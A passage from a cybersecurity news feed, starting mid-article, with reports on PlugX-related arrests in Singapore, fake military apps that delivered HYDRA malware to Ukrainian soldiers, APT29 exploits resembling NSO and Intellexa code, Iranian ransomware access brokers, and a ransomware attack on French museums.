    Threat actors employ PlugX to gain full control over victims’ machines remotely, enabling them to execute commands like capturing the screen, logging keystrokes, managing processes, services, and registry entries, as well as opening a shell, researchers at Cyble tell The Cyber Express. In a hypothetical scenario, threat actors could send a phishing email containing a malicious attachment that, once opened, installs PlugX on the victim’s system. This would allow the threat actor to gain unauthorized access to the victim’s machine, exfiltrate sensitive data, and maintain persistence for prolonged periods undetected, Cyble researchers said.

    One of the most recent campaigns from APT31 – a threat actor last seen using PlugX RAT in March – saw six Australian members of parliament being targeted to gather intelligence on them. The hackers used pixel tracking emails from a domain pretending to be a news outlet to target the MPs. If opened, these emails tracked the recipients’ online behavior. According to an earlier FBI indictment, the APT31 hackers spammed various government individuals worldwide associated with IPAC with more than 10,000 malicious emails that also exploited zero-days and resulted in the potential compromise of economic plans, intellectual property and trade secrets. The Singapore Police Force, however, did not link the arrested individuals to any threat group, and details on this remain unclear.

    Facing the Full Force of the Law

    The five Chinese nationals arrested in Singapore are set to face charges under Singapore’s Computer Misuse Act 1993. If found guilty, they could face severe penalties, including imprisonment and hefty fines. The most common charges include unauthorized access to computer systems, possession of hacking tools, and the illicit handling of personal data. The Computer Misuse Act enforces strict measures against cybercrime, with penalties ranging from fines of up to $10,000 to imprisonment for up to three years, or both. The Singaporean man, charged with abetting these crimes, faces similar consequences under the same law.

  • Hackers Target Ukrainian Army with Fake Military Apps to Siphon Authentication and GPS Data
    by Mihir Bagwe on September 5, 2024 at 9:06 pm

    Cyberwarfare just got a new battlefield: the Ukrainian army’s pockets! As Kyiv and Moscow engage in renewed hostilities and fire dozens of missiles every day across the border, the cyber realm is heating up too. Attackers posing as legitimate sources lured Ukrainian military personnel into downloading malware-laden fake military apps, aiming to steal authentication credentials and GPS coordinates from soldiers’ phones—a move that could have endangered lives on the battlefield. The Ukrainian Computer Emergency Response Team (CERT-UA), in collaboration with key military units, identified and neutralized two cyberattacks designed to infiltrate the mobile devices of military servicemen. The attackers distributed fraudulent links disguised as legitimate apps for critical military systems, including the AI-based GRISELDA system and the military tracking system known as “Eyes.”

    Weaponized Apps as Attack Vectors

    Hackers have evolved, shifting from targeting networks to exploiting the very devices soldiers carry. In this case, attackers used Signal, a secure end-to-end encrypted messaging app, to distribute links mimicking the official websites of Ukrainian military systems. Once clicked, these links triggered downloads of malware posing as mobile applications for GRISELDA and Eyes. GRISELDA is an artificial intelligence-based system for information processing which Ukraine uses to process battlefield information at lightning speed. The malicious link in this case led users to a fake website offering a supposed mobile version of the GRISELDA app, which in reality does not exist. What soldiers actually downloaded was HYDRA—a backdoor malware designed to steal data and remotely access the infected device. The malware could exfiltrate everything from authentication tokens to keystrokes.

    The Fake GRISELDA website and mobile application (Source: CERT-UA)

    Meanwhile, the Eyes system, a tool used for military tracking, became another target. Hackers modified its legitimate software, embedding malicious code capable of stealing login credentials and device GPS coordinates. This added another layer of danger—GPS location tracking could be used to identify and target soldiers in real time.

    Why Mobile Devices Are Key Targets

    Mobile devices are central to modern warfare, enabling soldiers to communicate and access mission-critical systems. State hackers recognize this and are focusing their attacks on smartphones, knowing that compromising a device can give them access to far more sensitive military information. These devices are often used for accessing specialized military systems, which makes them a prime target for cyber espionage. Stealing GPS data or login credentials from these devices could allow attackers to track troop movements or even intercept classified communications. In a battlefield scenario, this could lead to devastating consequences, putting soldiers’ lives directly at risk.

    Coordinated Response Mitigates Threats

    CERT-UA worked closely with military unit A0334 and a joint response team from the Ministry of Defense and Armed Forces to investigate the cyberattacks. Their prompt identification and analysis of the attacks significantly reduced the probability of any long-term damage. They also enlisted the help of the private sector, including Google Cloud and Cloudflare, in neutralizing the cyber threats. The ability to detect and respond to cyberattacks in real time was critical. CERT-UA and its partners moved swiftly, keeping the potential consequences of the attacks to a minimum.

    The Role of AI and Malware in Cyberwarfare

    The AI-powered GRISELDA system was a key target for hackers. AI systems like GRISELDA help military units process vast amounts of data quickly, making them essential tools in modern combat scenarios. But the same features that make these systems valuable also make them highly attractive targets for attackers. In this case, the HYDRA backdoor malware served as the attack tool of choice. Once installed, HYDRA granted attackers access to session data, keystrokes, and more. The malware even allowed for the capture of HTTP cookies—small pieces of data used to maintain authentication between a user and a website—further exposing sensitive military data to theft. For the Eyes tracking system, the attack was more subtle. Hackers modified the legitimate program by embedding a third-party Java class that enabled the app to steal GPS coordinates and login information. This small change could have been catastrophic had it gone undetected, potentially giving adversaries insight into troop movements.

    Strengthening Mobile Device Security

    The incident showcases the critical importance of mobile device security for military personnel. Soldiers rely on their phones for everything from communication to navigation, and even a single compromised device could lead to disastrous consequences. To combat this, militaries must adopt comprehensive security measures tailored to mobile devices. This includes regular software updates, use of encryption, and restricting the installation of apps to trusted sources only. CERT-UA’s swift response is a strong example of the need for real-time detection and rapid action when a cyber threat is identified. Military units should also be vigilant about phishing attacks, as this incident shows how social engineering tactics can be used to trick personnel into installing malware. By distributing malicious links through Signal, a commonly trusted secure messenger, the attackers played on the trust soldiers have in their communication tools.

    Cyber Defense Lessons from Ukraine

    Ukraine’s experience in countering these cyberattacks offers valuable lessons for other nations and their military organizations. Close cooperation between military cybersecurity teams, cloud infrastructure providers like Google Cloud, and private sector cybersecurity specialists proved to be an effective defense mechanism. This partnership ensured the timely mitigation of cyber threats and the safeguarding of sensitive military systems. As warfare increasingly moves into the digital realm, military units worldwide must bolster their cybersecurity capabilities. The threat landscape is evolving rapidly, and cyberattacks targeting mobile devices are becoming more sophisticated. Nations can no longer afford to treat cybersecurity as an afterthought. The threat is real—and it’s in the palm of your hand.

  • Russian State Hackers Using Exploits ‘Strikingly Similar’ to Spyware Vendors NSO and Intellexa
    by Mihir Bagwe on August 29, 2024 at 9:28 pm

    Google has identified a connection between Russian state hackers and exploits that bear an “identical or strikingly similar” resemblance to those created by spyware companies NSO Group and Intellexa, raising concerns about the spread of commercial spyware into the hands of state-backed threat actors. In a blog post, Google revealed its discovery of these exploits, but admitted uncertainty about how the Russian government acquired them. This incident, according to Google, illustrates the risks when spyware developed by private companies falls into the hands of highly “dangerous threat actors.” The hackers, known as APT29, have been linked to Russia’s Foreign Intelligence Service (SVR). This group has a well-documented history of conducting cyber-espionage and data theft operations against high-profile targets, including tech companies like Microsoft and SolarWinds, as well as various government entities.

    Watering Hole Attacks on iPhones, Android Devices

    Google’s investigation found that the malicious code had been planted on Mongolian government websites from November 2023 to July 2024. During this period, visitors to these sites using iPhones or Android devices could have had their devices compromised and personal data, such as passwords, stolen in a type of attack known as a “watering hole.” Watering hole attacks are a tactic where attackers compromise legitimate websites to infect site visitors. The attackers exploited vulnerabilities in the Safari browser on iPhones and Google Chrome on Android—both of which had been patched before the Russian campaign began. However, devices that hadn’t been updated remained vulnerable. The iPhone exploit was particularly concerning, as it was designed to capture cookies from Safari, specifically targeting accounts hosted by online email providers used by Mongolian government officials. With access to these cookies, attackers could potentially infiltrate these accounts. Similarly, the attack on Android devices employed two separate exploits to extract cookies stored in the Chrome browser.

    Brief Overview of the Mongolian Campaign

    The watering hole attacks compromised the Mongolian government websites cabinet[.]gov[.]mn and mfa[.]gov[.]mn. These sites loaded a hidden iframe from attacker-controlled domains. The campaigns targeted:

      • iOS users between November 2023 and February 2024: A WebKit exploit (CVE-2023-41993) affecting devices running iOS versions older than 16.6.1. This exploit delivered a cookie stealer framework observed by TAG in a suspected APT29 campaign in 2021. The targeted websites included webmail services and social media platforms.
      • Android users with Google Chrome (July 2024): A Chrome exploit chain targeting vulnerabilities CVE-2024-5274 and CVE-2024-4671. This chain included a sandbox escape exploit to bypass Chrome’s Site Isolation protection, allowing attackers to steal a broader range of data beyond cookies.

    Exploit Similarities

    The iOS exploit used in the watering hole attacks mirrored one used by Intellexa in September 2023. Both exploits shared the same trigger code and exploitation framework, suggesting a potential common source. Additionally, the Chrome exploit chain incorporated techniques similar to those observed in a sandbox escape exploit used by Intellexa in 2021.

    ‘Strikingly Similar’ Spyware Exploits a Mystery

    Clement Lecigne, the Google security researcher who authored the blog post, explained that while the exact targets of the Russian hackers are not fully known, the location of the exploit and typical visitors suggest that Mongolian government employees were likely in the crosshairs. Lecigne, a member of Google’s Threat Analysis Group, which specializes in investigating state-sponsored cyber threats, pointed out that the exploit code reuse points to Russian involvement. The same cookie-stealing code was observed in a previous campaign by APT29 in 2021. The mystery behind how Russian hackers initially gained access to the exploit code remains unresolved, however. Google reported that the code used in both Mongolian attacks closely matched the exploits developed by NSO Group and Intellexa, companies recognized for creating spyware capable of breaching even fully updated iPhones and Android devices. Google emphasized that the Android exploit shared a “very similar trigger” with one from NSO Group, while the iPhone exploit used “the exact same trigger” as one from Intellexa, strongly suggesting a link between the exploit authors or providers and the Russian hackers.

    ‘NSO Does Not Sell to Russia’

    While the claims from Google show an overlap of exploits and potential links between Russia and private spyware vendors, the NSO Group has denied these links. Gil Lainer, Vice President for Global Communications at NSO Group, told The Cyber Express, “NSO does not sell its products to Russia.” “Our technologies are sold exclusively to vetted US and Israel-allied intelligence and law enforcement agencies. Our systems and technologies are highly secure and are continuously monitored to detect and neutralize external threats.” Both the U.S. and Israel have previously investigated NSO Group’s clientele and kept a close eye on it.

  • Iranian State Hackers Act as Access Brokers for Ransomware Gangs, Target U.S. and Allies’ Critical Infrastructure
    by Mihir Bagwe on August 28, 2024 at 8:39 pm

    A shadowy group of Iranian cyber actors is acting as access brokers for ransomware gangs and collaborating with affiliates to target the U.S. and its allies, exploiting vulnerabilities across sectors ranging from healthcare to local government. The FBI, CISA, and the Department of Defense Cyber Crime Center (DC3) warned today that these actors, believed to be state-sponsored, are focusing aggressively on access brokering and enabling ransomware attacks.

    ‘Pioneer Kitten’ Targets Critical Sectors

    These Iranian state-backed cyber operatives, tracked under a number of aliases such as “Pioneer Kitten,” “Fox Kitten” and “Lemon Sandstorm,” started as early as 2017 and have intensified their activities through August 2024. These threat actors have been leveraging their access to critical U.S. infrastructure to collaborate with ransomware groups, creating a nexus of threats. The group’s focus spans multiple critical U.S. industries, including education, finance, healthcare, and defense, as well as government entities. These cyber actors are not only breaching networks but are also selling access to ransomware affiliates, such as NoEscape and BlackCat (also known as ALPHV), enabling these groups to execute ransomware attacks more effectively. The partnership between the Iranian actors and ransomware groups goes beyond mere access sales; they actively strategize to lock networks and maximize ransom payouts.

    State-Sponsored Freelance Operatives?

    While the FBI assesses that these actors are associated with the Government of Iran (GOI), their activities appear to operate on two fronts. On one hand, they conduct state-sponsored operations, particularly targeting Israel, Azerbaijan, and the UAE, to steal sensitive technical data. On the other, they engage in ransomware-enabling activities that seem unsanctioned by the Iranian government, raising questions about the true extent of their independence. Microsoft also reported on an Iranian threat actor today – “Peach Sandstorm” – that is targeting the satellite, communications, energy and government sectors in the U.S. and UAE, with espionage activities more typical of state threat actors.

    Access Brokers for Ransomware Affiliates Among Tactics

    The collaboration between these Iranian actors and ransomware groups is a significant development in the way state-sponsored actors work. They offer their partners full domain control and domain admin credentials, making it easier for ransomware groups to deploy their attacks. The affiliates, in turn, reward them with a cut of the ransom, which the Iranian actors receive in cryptocurrency—a method that further complicates tracking their activities. Historically, these actors focused on gaining access to networks and selling that access on underground marketplaces. Now, they’re taking a more hands-on approach. This collaboration isn’t just about selling access; these actors are now deeply involved in executing the ransomware attacks themselves, locking down networks and negotiating with victims.

    Exploiting Vulnerabilities

    These Iranian actors have been known to exploit a range of vulnerabilities in widely used networking devices. For example, they have targeted Citrix NetScaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887) and, most recently, Palo Alto Networks’ PAN-OS (CVE-2024-3400). Palo Alto had in April revealed this RCE bug as actively exploited. The threat actors use these vulnerabilities to gain initial access, often scanning IP addresses with tools like Shodan to identify exploitable devices. Once inside, they utilize web shells, deploy backdoors, and create malicious scheduled tasks to maintain persistence. They also repurpose compromised credentials to escalate privileges within the victim’s network, making their operations difficult to detect and stop. They’ve even been observed disabling security software and using legitimate tools like AnyDesk for remote access, making it harder for defenders to spot malicious activity.

    Hack-and-Leak Campaigns

    These Iranian actors have also been involved in hack-and-leak operations, such as the Pay2Key campaign in late 2020, which targeted Israel. They stole data and leaked it on the dark web to undermine Israel’s cyber infrastructure. Unlike typical ransomware campaigns, these operations are aimed more at causing political and social disruption than at financial gain.

    Iranian Threat Mitigations and Recommendations

    To counter these threats, the FBI and CISA recommend that organizations review their logs for any traffic associated with known malicious IP addresses, apply patches to vulnerabilities like CVE-2024-3400, and check for unique identifiers linked to these actors. Regularly validating security controls against behaviors mapped to the MITRE ATT&CK framework is also advised. The increasing sophistication of, and collaboration between, Iranian cyber actors and ransomware groups call for heightened vigilance across all sectors, particularly those critical to national security. As these actors continue to evolve, the line between cybercrime and state-sponsored espionage blurs further. Staying vigilant is an imperative, as the consequences of these attacks go beyond financial loss—they strike at the heart of national security.

  • Ransomware Hits French Museums Amid Olympic Cyberattacks Surge
    by Mihir Bagwe on August 6, 2024 at 3:45 pm

    A ransomware attack crippled the IT systems of France’s national museum network on Sunday, the Paris prosecutor’s office said. The cybercrime unit of the French police has launched an investigation into the breach, which affected approximately 40 museums, as cyberattacks targeting the Paris Olympics have surged. Among the impacted institutions is the Grand Palais, a prominent Paris museum and exhibition hall temporarily converted into a sports venue for the ongoing Paris 2024 Summer Olympics, hosting fencing and taekwondo competitions. The attackers have reportedly encrypted some of the financial data and are threatening to release it unless an undisclosed ransom amount is paid. Despite the cyberattack, the prosecutor’s office confirmed that Olympic operations remain unaffected.

    France Sees Cyberattacks Surge Amid Paris Olympics 2024

    The incident is the latest in a string of cyberattacks targeting France during the Olympic Games. Outgoing Prime Minister Gabriel Attal disclosed last week that authorities thwarted 68 cyberattacks in the Olympics’ opening days, with two aimed at Olympic facilities at Bercy and La Villette. “All these 68 cyberattacks, including the two cyberattacks that targeted Olympic sites, were detected in time and foiled,” Attal said. Beyond the digital realm, France’s critical infrastructure has also come under pressure. While coordinated arson attacks disrupted the country’s rail network on the opening ceremony day, a major sabotage operation targeted the fiber network a few days later. Both incidents are under investigation.

    France Prepared for Olympic Cyberattacks

    France’s cybersecurity agency, ANSSI, had anticipated a surge in cyber threats leading up to the Olympics and spent the past two years bolstering defenses through penetration testing and public awareness campaigns. “Our goal isn’t to completely block attacks during the Olympics,” ANSSI Director Vincent Strubel had said in April. “It’s to significantly reduce their impact by enhancing security.” Just ahead of the Games, French authorities launched a major operation to clean up computers infected by a cyber espionage program that has struck millions of users worldwide. The scale of cyber threats facing the Olympics is immense. Cisco, which officially oversees the cybersecurity and network security of the Olympic Games, said the previous Olympics held in Tokyo saw 450 million cyberattacks, most of which were attempts to paralyze IT networks by overwhelming them. The head of technology for Paris 2024 said he anticipated “eight times more” cyberattacks than Japan had experienced.
